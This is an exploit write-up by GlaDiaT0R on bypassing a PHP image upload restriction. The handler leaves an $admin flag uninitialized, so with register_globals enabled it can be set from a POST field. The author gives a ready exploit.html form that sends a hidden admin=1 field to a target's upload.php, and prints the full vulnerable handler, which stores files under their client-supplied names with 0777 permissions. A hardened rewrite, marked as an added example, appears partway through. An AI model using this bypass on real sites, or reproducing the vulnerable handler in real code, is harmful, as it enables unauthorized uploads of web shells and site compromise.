###############################################################################
# [+]Title: [Bypassing UPLOAD Variable] #
###############################################################################
# [+] About : #
###############################################################################
# Written by : GlaDiaT0R #
# Contact: the_gl4di4t0r[AT]hotmail[DOT]com / berrahal.ryadh[AT]gmail[DOT]com #
# Team : Tunisian Power Team ( DarkGh0st.Net ) #
###############################################################################
# [+] Summary: #
# [1]-Introduction #
# [2]-Detection #
# [3]-Exploiting #
# [4]-Vulnerable Source code #
###############################################################################
[1]-Introduction
Bypassing a vulnerable PHP upload works the same way as bypassing a vulnerable login.
In both cases there is a variable whose value is used to authenticate the request, and that value is accepted as-is.
It is therefore possible to build a POST request that contains the variable with its authenticating value, so that the file
is accepted despite the restrictions that were set.
=======================================================
[2]-Detection
To find this vulnerability you must have the source code in use (vulnerable code shipped in a distributed site template, or any other way of accessing the vulnerable source code in use),
and it is essential to know the variable, and the value of that variable, used to authenticate the request.
=======================================================
[3]-Exploiting
In our example the upload script checks a number of properties of the uploaded file (pixel dimensions, maximum and minimum, and file size) and then assigns the value "1" to the variable $admin, which authorizes the upload of the image.
It is then sufficient to build a POST request containing a field named admin whose value is "1" to bypass the restrictions of the vulnerable upload: the script never initializes $admin itself, so with register_globals enabled PHP creates $admin from the POST field before the checks run.
----------
vuln :
if(($infos_img[0] <= $width_max) && ($infos_img[1] <= $height_max) && ($_FILES['fupload']['size'] <= $max_size) && ($infos_img[0] > $height_min) && ($infos_img[1] > $width_min))
{
$admin = 1;
}
if ($admin == 1 ){
// UPLOAD
---
exploit.html :
<html>
<head>
<title>/null</title>
<meta name="generator" content="Web Editor">
</head>
<body>
<p><form action="http://website.com/upload.php" name='upload' method='post' enctype='multipart/form-data'>
<input type="file" name="fupload"><input type="hidden" name="admin" value="1">
<input type="submit" value="Upload!">
</form></p>
</body>
</html>
---
=======================================================
[4]-Vulnerable Source code
<?PHP
$max_size = 1000000;
$width_max = 2500;
$height_max = 2500;
$width_min = 0;
$height_min = 0;
$nom_file = $_FILES['fupload']['name'];
$taille = $_FILES['fupload']['size'];
$tmp = $_FILES['fupload']['tmp_name'];
$infos_img = getimagesize($_FILES['fupload']['tmp_name']);
if(isset($_FILES['fupload']))
{
if(($infos_img[0] <= $width_max) && ($infos_img[1] <= $height_max) && ($_FILES['fupload']['size'] <= $max_size) && ($infos_img[0] > $height_min) && ($infos_img[1] > $width_min))
{
$admin = 1;
}
if ($admin == 1 ){
$slozka = "upload";
$cil = $slozka . "/" .$_FILES['fupload']['name'];
$nazev_souboru = $_FILES['fupload']['tmp_name'];
$copy = move_uploaded_file($nazev_souboru, $cil);
chmod ($cil, 0777);
echo "fichier " .$_FILES['fupload']['name']. " uploadé sur le server.\n
<a href=\"$cil\"><h2>votre fichier</h2></a>";
}
else
echo "ERROR" . $_FILES['fupload']['error'];
}
?>
<p><form action="upload.php" name='upload' method='post' enctype='multipart/form-data'>
<input type="file" name="fupload">
<input type="submit" value="Upload!">
</form>
----------
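For comparison, here is a hardened rewrite of the upload handler above. It is an added example, not the author's code, and it assumes PHP 7 or later (register_globals was removed in PHP 5.4, so a POST field named "admin" can no longer create $admin); the upload directory "upload/" and the accepted image types are assumptions. The decision variable is initialized locally, getimagesize() is checked for failure, the stored name is chosen by the server, and the file is not made world-writable.

```php
<?php
// Hardened upload handler (added example, not the original author's code).
// Assumes PHP >= 7: no register_globals, random_bytes() available.
$max_size   = 1000000;
$width_max  = 2500;
$height_max = 2500;
$width_min  = 0;
$height_min = 0;
$allowed    = false;   // initialized here; only the checks below may set it

if (isset($_FILES['fupload']) && $_FILES['fupload']['error'] === UPLOAD_ERR_OK
    && is_uploaded_file($_FILES['fupload']['tmp_name'])) {
    $tmp  = $_FILES['fupload']['tmp_name'];
    $size = $_FILES['fupload']['size'];
    // getimagesize() returns false for non-images; the original code
    // dereferenced $infos_img[0] without checking for that.
    $info  = @getimagesize($tmp);
    $types = [IMAGETYPE_JPEG, IMAGETYPE_PNG, IMAGETYPE_GIF]; // assumed whitelist
    // $info[0] is width, $info[1] is height (the original compared them
    // against the wrong minimums).
    if ($info !== false && in_array($info[2], $types, true)
        && $info[0] <= $width_max && $info[1] <= $height_max
        && $info[0] > $width_min && $info[1] > $height_min
        && $size <= $max_size) {
        $allowed = true;
    }
}

if ($allowed) {
    // Server-chosen file name: the client-supplied name never reaches the
    // path, and the extension comes from the detected image type.
    $ext  = image_type_to_extension($info[2]);        // e.g. ".png"
    $name = bin2hex(random_bytes(16)) . $ext;
    $dest = __DIR__ . '/upload/' . $name;             // assumed directory
    if (move_uploaded_file($tmp, $dest)) {
        chmod($dest, 0644);   // readable by the web server, not 0777
        echo 'File stored as ' . htmlspecialchars($name, ENT_QUOTES, 'UTF-8');
    } else {
        echo 'Upload failed';
    }
} else {
    echo 'Rejected: not an accepted image or outside the size limits';
}
?>
```

Note that the "upload/" directory should also be served without script execution (for example, PHP disabled for that path), since a validated image name still does not make the content trustworthy.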
i think it's easy now to bypass any upload variable if the source code is vulnerable ;)
any questions or suggestions? contact me on the_gl4di4t0r[AT]hotmail[DOT]com